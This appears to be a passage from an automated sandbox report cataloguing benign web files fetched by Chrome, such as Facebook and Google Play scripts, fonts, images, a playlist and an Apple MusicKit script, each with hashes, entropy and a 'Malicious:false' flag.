                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwmTAm6th93AehIFDXhvEhkSBQ3Fk8Qk?alt=proto
                                                                                                                                                                                                                                  Preview:CjIKCw14bxIZGgQIVhgCCiMNxZPEJBoECEsYAioWCApSEgoIQCEuIyRfKi0QARj/////Dw==
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines (1984)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9204
                                                                                                                                                                                                                                  Entropy (8bit):5.329185491092467
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4RbGMN3dbr3/5kHIb+5VnNACeSLxxS5mwgWcawn/ADhuDVC5:4RFN3dbr3/5KNA6LxxPWkADh8VY
                                                                                                                                                                                                                                  MD5:ED263CCBB5012FA8240EFFE80AAD5CC1
                                                                                                                                                                                                                                  SHA1:89DFCBC546AC3F54BB54BEA9951FD58C14B37541
                                                                                                                                                                                                                                  SHA-256:2281C32FEF109437CF131D03ED582531064D890496CD77A81E777169D5EB6168
                                                                                                                                                                                                                                  SHA-512:AD771EF05A60CFB1270BCFAC4518FD870F66B3D55D320D6E9A031FFB85A20BD742BE9871CB087D87EC049EBB71FB3AAF912AFA064E4EBFF38E0875741E03AE2A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("Banzai",["cr:7383"],(function(a,b,c,d,e,f,g){g["default"]=b("cr:7383")}),98);.__d("EventEmitterWithValidation",["BaseEventEmitter"],(function(a,b,c,d,e,f){"use strict";a=function(a){babelHelpers.inheritsLoose(b,a);function b(b,c){var d;d=a.call(this)||this;d.$EventEmitterWithValidation1=Object.keys(b);d.$EventEmitterWithValidation2=Boolean(c);return d}var c=b.prototype;c.emit=function(b){if(this.$EventEmitterWithValidation1.indexOf(b)===-1){if(this.$EventEmitterWithValidation2)return;throw new TypeError(g(b,this.$EventEmitterWithValidation1))}return a.prototype.emit.apply(this,arguments)};return b}(b("BaseEventEmitter"));function g(a,b){a='Unknown event type "'+a+'". ';a+="Known event types: "+b.join(", ")+".";return a}e.exports=a}),null);.__d("JstlMigrationFalcoEvent",["FalcoLoggerInternal","getFalcoLogPolicy_DO_NOT_USE"],(function(a,b,c,d,e,f,g){"use strict";a=c("getFalcoLogPolicy_DO_NOT_USE")("1814852");b=d("FalcoLoggerInternal").create("jstl_migration",a);e=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1130)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1854
                                                                                                                                                                                                                                  Entropy (8bit):5.311393905103868
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:SKh3RakwAerXcySXPpQxpNpm1TsPSnryYml9:xh8kwA0Gb1TSork9
                                                                                                                                                                                                                                  MD5:5025D5524D28AA6879A5F6504C6F1540
                                                                                                                                                                                                                                  SHA1:D698AFAAE964F9EE09E3C9BAB04775367E1AAD12
                                                                                                                                                                                                                                  SHA-256:C032E30CA71DBF354429DBA854AF78020A36BAC804397992C317A2667128AB47
                                                                                                                                                                                                                                  SHA-512:AEAE9632C460D6E5850A3FAF1246EEA8AF0A88CA4A902ED4B2B3CE7D94AD5825D76B31B2372B6CEC3F2E33CDE216853B53FD8FC0203B6CFD01F7B8ED263EAF4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype;b.addSubscriptions=function(){for(var a=arguments.length,b=new Array(a),c=0;c<a;c++)b[c]=arguments[c];b.every(i)||h(0,3659);this.$1!=null?this.$1=this.$1.concat(b):b.forEach(j)};b.engage=function(){this.$1==null&&(this.$1=[])};b.release=function(){this.$1!=null&&(this.$1.forEach(j),this.$1=null)};b.releaseOne=function(a){var b=this.$1;if(b==null)return;var c=b.indexOf(a);c!==-1&&(j(a),b.splice(c,1),b.length===0&&(this.$1=null))};return a}();g["default"]=a}),98);.__d("throttle",["TimeSlice","TimeSliceInteractionSV","setTimeout","setTimeoutAcrossTransitions"],(function(a,b,c,d,e,f,g){function a(a,b,d){return h(a,b,d,c("setTimeout"),!1)}Object.assign(a,{acrossTransitions:function(a,b,d){return h(a,b,d,c("setTimeoutAcrossTransitions"),!1
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):273514
                                                                                                                                                                                                                                  Entropy (8bit):5.858624990111249
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:Cqo6/8+1qo6/8+kqo6/8+ydWbPqCn4VTlt7:7dWzqCnyt7
                                                                                                                                                                                                                                  MD5:FCD57EF96F3CBBEF0A279FE5A3A3B4AD
                                                                                                                                                                                                                                  SHA1:9687B3A6F62B13DB2AD6139F266583148F408577
                                                                                                                                                                                                                                  SHA-256:7B182CC29BF97135EF18D86C13B2509FC99AC37BD5575F7C52B8F29F683C8B3B
                                                                                                                                                                                                                                  SHA-512:58BA80A4CC6FD61E31D1D96BAB0EB16992D75C6F20A882F9380FE8BE1AEE0183DD6DCFB8CD0202DA07202394C2333A58B523BA44044E2357C0FE9EED82F5AEAD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,C7e1Kc,CKm2Wb,CvxVpd,DRmmld,EEDORb,EFQ78c,ElYdAc,FCpbqb,FoxcOd,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,J22eF,JH2zc,JNoxi,JWUKXe,KUM7Z,Kfp2G,L1AAkb,LCkxpb,LEikZe,LRovxc,LcQwud,Lkzi5d,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PAQZbb,PHUIyb,PRm2u,PZ1hre,PrPYRd,QIhFr,RBsfwb,RMhBfe,RQJprf,RjJvI,RqjULd,SdcwHb,SpsfSb,UINLVc,ULFnWe,UUJqVe,UZStuc,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,WhJNk,Wt6vjf,XVMNvd,Y413Bc,YTx6oe,Z5uLle,ZDZcre,ZMKy0d,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dZ05Qb,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fI4Vwc,fKUV3e,fPcQoe,g6aYuf,gKWqec,grWkAb,gychg,hKSk3e,hc6Ubd,hhhU8,iAQMie,iLGjNb,jZ2Ncd,kJXwXb,kWgXee,kdbckd,kjKdXe,kpVlPe,kr6Nlf,lDZ2Fb,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mmmrlc,mzLjxc,n73qwf,oEJvKc,ovKuLd,pCKBF,pQUyNd,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qczJ2b,qk5AGd,qqarmf,qyd4Kb,rpbmN,s39S4,sJhETb,sOXFj,soHxf,t1sulf,tBvKNb,tKHFxf,uj8DUc,vNKqzc,vrGZEc,w08zce,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xI1uef,xQtZb,xUdipf,xii62b,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Z5wzge,CR2XMb,nQqY4c,baVq7b,zbKb5e,JiSSTb,Grlxwe,wxpxie,XMEW5d,QxNhAd,C7s1K,o6xa3b,G2gJT,q8s33d,Qf3l6c"
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".Tj45d{position:relative}.ncIyJc{position:absolute;overflow:hidden;left:-1px;top:auto;width:1px;height:1px}.VfPpkd-NLUYnc-V67aGc{position:absolute;left:0;transform-origin:left top;line-height:1.15rem;text-align:left;text-overflow:ellipsis;white-space:nowrap;cursor:text;overflow:hidden;will-change:transform}[dir=rtl] .VfPpkd-NLUYnc-V67aGc,.VfPpkd-NLUYnc-V67aGc[dir=rtl]{right:0;left:auto;transform-origin:right top;text-align:right}.VfPpkd-NLUYnc-V67aGc-OWXEXe-TATcMc-KLRBe{cursor:auto}.VfPpkd-NLUYnc-V67aGc-OWXEXe-ztc6md:not(.VfPpkd-NLUYnc-V67aGc-OWXEXe-ZYIfFd-ztc6md-vXpfLb)::after{margin-left:1px;margin-right:0;content:\"*\"}[dir=rtl] .VfPpkd-NLUYnc-V67aGc-OWXEXe-ztc6md:not(.VfPpkd-NLUYnc-V67aGc-OWXEXe-ZYIfFd-ztc6md-vXpfLb)::after,.VfPpkd-NLUYnc-V67aGc-OWXEXe-ztc6md:not(.VfPpkd-NLUYnc-V67aGc-OWXEXe-ZYIfFd-ztc6md-vXpfLb)[dir=rtl]::after{margin-left:0;margin-right:1px}.VfPpkd-NLUYnc-V67aGc{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):32132
                                                                                                                                                                                                                                  Entropy (8bit):7.992096939239501
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Y7gwPOWsl2qLFs0fskF8jx6DDRaZOwuwHtp02FMPyUSUSv7U6NcAo9t:YpOWsS0EavwZHk26PPlI7LB0t
                                                                                                                                                                                                                                  MD5:151F38C4AB2D0B4D2974DDFFDCDCFE4D
                                                                                                                                                                                                                                  SHA1:CF3505BE735BCCBF393549909D16D7DCF136F91D
                                                                                                                                                                                                                                  SHA-256:522469DBA2E69F4E49E3A2CE317EAE101D1045AC391B73CED32A50B718F01D49
                                                                                                                                                                                                                                  SHA-512:ADA20B3637DFDFD96A944B0E83A8DF0677435345AB3BF70AEEBECE691475A616B981E83523D8C6C9A2A8FD501F911087ADED4E70AF2531C7CF12CC15CEF83BE1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/1YVfPMu-xnQmXy6NDTtqeQiXL2jYZZc79TZbrenrA6XsdhCcyT53UlJQltFNFXXH0G0=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF|}..WEBPVP8 p}...q...*..(.>m*.E."!...@..5.........~..w..G.[.{._...._f...K..?...3............~......#...U..._.../..P...o.U.......-.#...;........^...=@?.{um.|{.G........!.w.?......9._c..z...._.?.~.~U}.........M.........{..?.o.>...}..?...o..._].{./..........m..........D.z.}.}.........?..P.....m......._...|..:...G..._.....}s...7.....G.G..."L.u..>...I..M}?*f...ko...........\y.....T..X.....K.........6g.........M.p.D...ty65.............4!....S...'.....n.XWbQ..px.bxPb87.......}..17....2.y^...(z89vV..g.]...K.,...&...\.,..x.|k.:@..?....k.....#.....z.~.2p?..A...)N.Y.pQr)......?....Z..!.@.b{p..7..,w]...|6......A.T..fc.T....1...w......u^c.m.,....Y&.S...$..}..e.c.......C1...w..K..Eu...94..0d.J...'c.0.).%..2yr..y=.l...J].x......^AQ..;...^..#..6`\...XT..f@<{..S....8.b<...N....j...yw..d.......&...-....K{.h5...@.d.*qo..K.M.dYZlhy.Qh.\."OV...l..V~.....................$+g..H.....,...../zi:....N.Q`.c.d-..z.G...q.V.q...k.......X..J.?(V"...k..0~H.4..v`..*mx.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 15352, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15352
                                                                                                                                                                                                                                  Entropy (8bit):7.985451932526745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:iKXFCNSjIOyUObLAv+aGY+Axe4neARkGbqq:iwCAjfyUOYv+7wxHvqq
                                                                                                                                                                                                                                  MD5:4E63F9517611AF5C5680E4330B7B020E
                                                                                                                                                                                                                                  SHA1:0B656D159AFB6941054EB17AF7D8C36E7DD36FD5
                                                                                                                                                                                                                                  SHA-256:5825C88B68A498C8B3D8D34F0090A625F063A366C8F3CBEBF51E7657623FB13B
                                                                                                                                                                                                                                  SHA-512:430261CB783987FA1DBB4A11E0ABCAA3F5866400610528BFDDD7A2A7D18E2863C29D66ECC044E3588F7135620BE262D0C4B925DEAB610C19C5ABE504244CC0FD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://fonts.gstatic.com/s/googlesans/v58/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjYUvaYr.woff2
                                                                                                                                                                                                                                  Preview:wOF2......;........`..;..............................D..H?HVAR.'.`?STAT..'...0/<....$....b.0.T.6.$..@. ..B..t.........n.....`..18.4....D.....6T..OJ*r..'m.c|..$..f...z.V+.....w.....HC....y;.{uy?..pE.@!.m..S..J..F.{PW?..lD....#.E..dI.B.Q..Zn...8}........$.!:...).9.'(.....'.F..t2.....M}r+o...}......).......G....bx..m...F.S*nT....Y...gb..g..C.i.5.fLX.5.. H..P hH..%.P.....l{.i.w.(o*e?.}&G........[N..i.J....IIJL....~....@H...R.B.TW.:R....OW.W..K.*A..[....}..9.$.v.]._....D.{.7..{........5.;.#.jt.$.q.$|...O2&..ht4::.....s4...)..s.W.....a.n...B..._..80.......\......M..E..B=..f.......Q.h A..&.z.^].U..l.n..Z.^..#. ....p.$....A..-bO...k.M.h..][M.zb.?1.,....Iv.|.$.dz......&.2.......U.n...T.".l.....dE..{.w..Z^....x).2..;..:..v.WvU}.....+.+..t.A....k...#.S...!G.9.[..T...X..........-.a.@..|~.m.uJ.(.o.....&..$.......k..o.N..',iJ$.T...z.gB4%&#c+.&Q=Qev..V8S....93.T.`,.!.H...6...".......obK...8..D.*u.9..........cs|<.C-..1.i\."..q|D...1......f.D....4... &
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12786)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):70338
                                                                                                                                                                                                                                  Entropy (8bit):5.78742439640554
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:I8ZCnfiUZxilnEe6xw15ZKXlk4+1W7BH9zzOsB+ySF8A8ECnfd0ovY7ORxdC0TON:9ZTNwoZKX5oMH9bBTtjCviz7pE/Rxqh+
                                                                                                                                                                                                                                  MD5:ECF58AA5DE3AB7B77322D00E09F211E6
                                                                                                                                                                                                                                  SHA1:164D51A0CA69981195BCCF74510449CEA5A7CA09
                                                                                                                                                                                                                                  SHA-256:3B77180B30819B69D8927237E0B76841D2A441CF3603586108C27E59768288C5
                                                                                                                                                                                                                                  SHA-512:C857CFFB11171A170D452843EB2B505AA3672E0BCE99F470AC076D51FFA234313608AFF2C8774994C48008D857243E1B2EF560A5EB44F9AC8603935619AD2843
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".VfPpkd-YAxtVc{background-color:#333333}.VfPpkd-gIZMF{color:rgba(255,255,255,.87)}.VfPpkd-YAxtVc{min-width:344px}@media (max-width:344px),(max-width:480px){.VfPpkd-YAxtVc{min-width:100%}}.VfPpkd-YAxtVc{max-width:672px}.VfPpkd-YAxtVc{box-shadow:0 3px 5px -1px rgba(0,0,0,.2),0 6px 10px 0 rgba(0,0,0,.14),0 1px 18px 0 rgba(0,0,0,.12)}.VfPpkd-YAxtVc{border-radius:4px;border-radius:var(--mdc-shape-small,4px)}.VfPpkd-Ng57nc{display:none;position:fixed;right:0;bottom:0;left:0;align-items:center;justify-content:center;box-sizing:border-box;pointer-events:none;-webkit-tap-highlight-color:rgba(0,0,0,0)}.VfPpkd-Ng57nc-OWXEXe-uGFO6d,.VfPpkd-Ng57nc-OWXEXe-FNFY6c,.VfPpkd-Ng57nc-OWXEXe-FnSee{display:flex}.VfPpkd-Ng57nc-OWXEXe-FNFY6c .VfPpkd-gIZMF,.VfPpkd-Ng57nc-OWXEXe-FNFY6c .VfPpkd-M6tBBc{visibility:visible}.VfPpkd-YAxtVc{padding-left:0;padding-right:8px;display:flex;align-items:center;justify-content:flex-start;box-sizing:border-box;transform:scale(.8);opacity:0}.VfPpkd-Y
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 211 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):5200
                                                                                                                                                                                                                                  Entropy (8bit):7.9274026492660745
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rmf2rbOyPJ9hYAZBwj7T0vNwTdXcavRFbmI870JyBd8cHxm3irUovLQ+PqXF:rM2HOw9hRZu8v+THKvDHHxm3tojbyV
                                                                                                                                                                                                                                  MD5:71D6B687C90A54B1B86E17D906BA33CD
                                                                                                                                                                                                                                  SHA1:5DAB0FD4A2C06A7D49125C0954486A4321939605
                                                                                                                                                                                                                                  SHA-256:7308556C17835FEE3648F14C2B0E23026F81946842889B4586BEFCB5910E19A0
                                                                                                                                                                                                                                  SHA-512:0A925171EF387F880FD33995350873E9C7992FED89CC1688C9E4C2618B049B7C68CCEFB6F8E56490AC7C8C71D43665CF462E0AB9E8F779492C6D93F12C01785D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.facebook.com/images/pages/create/community_illustration.png
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............r......sRGB.........IDATx...p\.u...7.u_.IH....2..i.2y.$$...:.&$....@.dRh...dx......J..W,..d...l.,Y.w..%Y...V..J..z...q.Xw.>.{....g..-y......s......f..."$......I.Hz..Vw.*...^,...k.8.$.u.8..........N....@X...5....^%m...@..P.zC.{..cg.]....@d.o.c...S....G.CA..F......(.V.-.h.K....LXkfl....._.5.m..x.#.&...vk..\g.)..1..........Sf.c..sZI.8.....`.{.............E.L.."O!........~l....E.....L.@....".k..O...`..{..............bI{.g.|..;.t.5.....K`.h.K..r?9L..Y.X......i.{...v|/.7......=.. .E....b.7.Ax.O..j.....=..0%#.&...H......nY.......\..["...+x.W#...P....h.No.X{...)x.Gl...K.am3_....[.V..3x.ug8g..%.!]h.......E.ph..2..{.c.<x.~.phn%m!.F.6O....v..'].KQ&/...>8..K......*..t.2@......H.I7....~v.=.... .W..`%..A ..!ZE..Ic.......S.".Mt...GuW.R0.......SA....Yo..L.1z....)..d....UVu4.bI....}.I...S.gG.1V..gT=.(.OPt....tbI....l....x.>>d&<.c...t.M./..gXZZ.~ml|....\.....d.N..t.i.s.F........=.y..9....Y.....t6j....rHU..#H.!.3.,C t.Rl.....P..l..i.!.gU...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):903
                                                                                                                                                                                                                                  Entropy (8bit):5.372090323906076
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:PNfsAAjdrNW8/t3JdrAjP1drAYc6drXvuYJdravSgdrA0HdrRmHTdrS5:lfRcdprdM9dkAdjGYJdmKgd9HdMTdM
                                                                                                                                                                                                                                  MD5:255473BB47E5EDD79F2CCBFB9F6D4369
                                                                                                                                                                                                                                  SHA1:8724C535C715E135246F2292340136F3E47BAE20
                                                                                                                                                                                                                                  SHA-256:C29E311AD195EBB97EA8C62F5B4A42FFEAACE8DE3E83AF4170A61B1C3730F163
                                                                                                                                                                                                                                  SHA-512:6575FA3FBD52B465EE25EDC55726BEC219B233D4F62F60C68810C107217D8FA9EC6F45C6D090F09A6628EDDC7968FB3060DEB42A785260F9F25B3D307C7F9466
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/7d/63/19/7d631997-4ce4-6ce9-9141-f0ad3602b2a9/P875466468_Anull_video_gr250_sdr_652x1412.m3u8
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_video_gr250_sdr_652x1412-.mp4",BYTERANGE="899@0".#EXTINF:3.60000,..#EXT-X-BYTERANGE:1647776@899.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2090789@1648675.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.53333,..#EXT-X-BYTERANGE:911497@3739464.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:2.63333,..#EXT-X-BYTERANGE:621829@4650961.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:3.63333,..#EXT-X-BYTERANGE:1666431@5272790.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.70000,..#EXT-X-BYTERANGE:2040977@6939221.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXTINF:5.20000,..#EXT-X-BYTERANGE:1551608@8980198.P875466468_Anull_video_gr250_sdr_652x1412-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (372)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):916
                                                                                                                                                                                                                                  Entropy (8bit):5.011086393987294
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:u6oTTlrIYevhTuKtLG0M+qJHHVvC2ItVFRJB1i/YAo:upnlrpevhTuAG9+Uk2a3+G
                                                                                                                                                                                                                                  MD5:5996AFA7749EBBC4BECDC9452C6D32E3
                                                                                                                                                                                                                                  SHA1:B01CBFE75F4DDD0A16425AEA26A83DF0559C5FC6
                                                                                                                                                                                                                                  SHA-256:FC72BC08DCE66EAEA9F8B0C665814EE0760A52BD047ECD77572CED5BB3B69E42
                                                                                                                                                                                                                                  SHA-512:5E96D4F1C3FC0EA8BBA17ABE3828A552C9368A6639643374E17F298E8DC129A1CC982F5ADDFA0EE1DC7ADAB1ECE2EBA373ED6BA54E479658BD7113345FA88B4A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.var e="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function n(e,n,o){return e(o={path:n,exports:{},require:function(){return function(){throw new Error("Dynamic requires are not currently supported by @rollup/plugin-commonjs")}()}},o.exports),o.exports}export{e as a,n as c}
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 480x360, components 3
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):15897
                                                                                                                                                                                                                                  Entropy (8bit):7.946740870330592
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:jbbbbbbbbbbbbbQzT3j3io+WNhNGm5AF1oXusCoK9YQkOijdHsLe0xG1ozUo+bWD:QT3jSoBGm5O1ojLQ3ij1+x1oy3jxjCWr
                                                                                                                                                                                                                                  MD5:1CEB0790FB55DA1C7D5347CD7940B21A
                                                                                                                                                                                                                                  SHA1:F737DB3F0DC45D269458AA7A020695A6C5C24BD5
                                                                                                                                                                                                                                  SHA-256:20789D99A3355C0786C4BE414F2B24012E4D544BF105CA3AE702BA2434F0E778
                                                                                                                                                                                                                                  SHA-512:70429B634B8EC4101A8A93DA192F1796A51E8A324AF601ECBBEE28C2EF7D344DBB7024D6B172E4D162EAC6C853D72AB20C01C6CD008D8B3799A2919993AADBDC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://i.ytimg.com/vi/y0Bm8EIP13g/hqdefault.jpg
                                                                                                                                                                                                                                  Preview:......JFIF...............................%....%..''.'10-(--5=PB58K9+-EaEKSV[\[2AemdXlPY[W......./..0]@8BWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW......h....".......................................F........................!.1AQ."a...2Rq........#B.Sbr.3C...$...cs..................................3........................!.1QA.."#2aq......B..$3R............?.......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B......!.!.@.B...G..zL.>..4..;....m..!t|.'.....#I.3..'G'...........|..i=&w.....63....4..;.<.'.........s..>E..gy.S.I}&w...d.6K..B.y._I....D..gy.S...l......$..;.<./.........x9.]/"K.3..#..L.>.:.<...sP.^D..gy.R6...;.t2x.%..!vc.53.>/iw.M.d....}.~..).-........G.!...U.........../..?..B....?....G.O......%.t...^..^'....P~..}8}..../..?..B...~'..w.P~..=8}.~........B.~..zq{...G..A.p.............I..2.y...O..W. ...S./.t...h^.......y......^.>..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):32132
                                                                                                                                                                                                                                  Entropy (8bit):7.992096939239501
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Y7gwPOWsl2qLFs0fskF8jx6DDRaZOwuwHtp02FMPyUSUSv7U6NcAo9t:YpOWsS0EavwZHk26PPlI7LB0t
                                                                                                                                                                                                                                  MD5:151F38C4AB2D0B4D2974DDFFDCDCFE4D
                                                                                                                                                                                                                                  SHA1:CF3505BE735BCCBF393549909D16D7DCF136F91D
                                                                                                                                                                                                                                  SHA-256:522469DBA2E69F4E49E3A2CE317EAE101D1045AC391B73CED32A50B718F01D49
                                                                                                                                                                                                                                  SHA-512:ADA20B3637DFDFD96A944B0E83A8DF0677435345AB3BF70AEEBECE691475A616B981E83523D8C6C9A2A8FD501F911087ADED4E70AF2531C7CF12CC15CEF83BE1
